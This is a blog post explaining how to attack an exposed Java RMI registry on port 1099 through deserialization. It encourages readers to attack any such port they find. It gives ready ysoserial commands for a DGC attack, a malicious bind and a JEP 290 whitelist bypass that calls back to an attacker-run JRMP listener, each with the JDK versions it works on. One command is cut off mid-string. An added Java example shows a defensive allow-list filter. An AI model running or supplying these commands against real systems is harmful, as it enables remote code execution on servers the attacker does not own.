
Java RMI register deserialization attack

2022-01-27 00:41:50 Shanfenglan7

1. Preface

What is attacked is the server side of the RMI registry, which usually listens on port 1099. If you encounter an exposed port 1099, you can try to attack it.

2. Exploitation

Don't worry about errors being reported; the command still executes normally.


2.1 The client attacks the registry

This is a way for a client to attack the registry. The principle is that the RMI framework uses DGC (Distributed Garbage Collection) to manage the life cycle of remote objects, so a malicious payload can be sent over the DGC communication channel and the registry will deserialize it.

Condition: jdk<=jdk8u111

java -cp ysoserial.jar ysoserial.exploit.JRMPClient 192.168.171.139 1099 CommonsCollections6 "touch 

2.2 The server attacks the registry

The server needs to bind the class it wants to register to the registry, so it can send serialized data directly to the registry, which can lead to a deserialization vulnerability.

# Use bind to bind a malicious payload to the registry; the registry deserializes it and the gadget chain executes the command directly.
Condition: jdk<=jdk8u111

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "touch /tmp/123"  

2.3 Bypassing the whitelist restriction

This restriction is also called JEP 290: the JDK provides built-in filters for the RMI registry and for the RMI distributed garbage collector respectively. Both filters are configured as whitelists, that is, only specific classes are allowed to be deserialized.
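As an added example (not code from the original post), the following Java 9+ program applies a JEP 290 allow-list filter of the same kind the registry and DGC filters use, so the behaviour can be seen without a live registry; the filter string, the `SerialFilterDemo` name and the sample objects are assumptions for illustration. The same pattern syntax is what the `sun.rmi.registry.registryFilter` and `sun.rmi.transport.dgcFilter` system properties accept.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.ArrayList;

// Added example: a JEP 290 allow-list filter applied to a plain ObjectInputStream.
// An RMI registry gets the equivalent protection from
// -Dsun.rmi.registry.registryFilter=... and -Dsun.rmi.transport.dgcFilter=... (JDK 8u121+ / 9+).
public class SerialFilterDemo {

    // Allow only String and the java.rmi package tree; "!*" rejects every other class.
    // (Filter string is an assumption chosen for this demo, not a recommended production value.)
    static final ObjectInputFilter ALLOW_LIST =
        ObjectInputFilter.Config.createFilter("java.lang.String;java.rmi.**;!*");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Returns true if the stream passed the filter, false if the filter rejected it.
    static boolean accepted(byte[] data) throws IOException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(ALLOW_LIST);
            ois.readObject();
            return true;
        } catch (InvalidClassException e) {
            // A filter rejection surfaces as InvalidClassException ("filter status: REJECTED").
            return false;
        } catch (ClassNotFoundException e) {
            throw new IOException(e);
        }
    }

    public static void main(String[] args) throws IOException {
        System.out.println("String accepted:    " + accepted(serialize("hello")));
        System.out.println("ArrayList accepted: " + accepted(serialize(new ArrayList<String>())));
    }
}
```

The String stream passes because `java.lang.String` is on the allow-list, while the ArrayList stream is rejected before any of its contents are read, which is why the gadget chains above fail against a filtered registry unless the whitelist itself can be bypassed.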

jdk8u232_b09 enforces whitelist restrictions on deserialized classes:


java -cp ysoserial.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections6 "touch /tmp/123"
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit2 192.168.171.139 1099 192.168.171.1 12345

Condition: jdk<=jdk8u232_b09


A special version of ysoserial is required; see the following article for details:

https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI

Reference articles

https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI
https://blog.csdn.net/qsort_/article/details/104874111
http://www.codersec.net/2018/09/%E4%B8%80%E6%AC%A1%E6%94%BB%E5%87%BB%E5%86%85%E7%BD%91rmi%E6%9C%8D%E5%8A%A1%E7%9A%84%E6%B7%B1%E6%80%9D/
https://paper.seebug.org/1194/#_7

Copyright notice
Author: Shanfenglan7. Please include the original link when reprinting, thank you.
https://en.cdmana.com/2022/01/202201270041480378.html
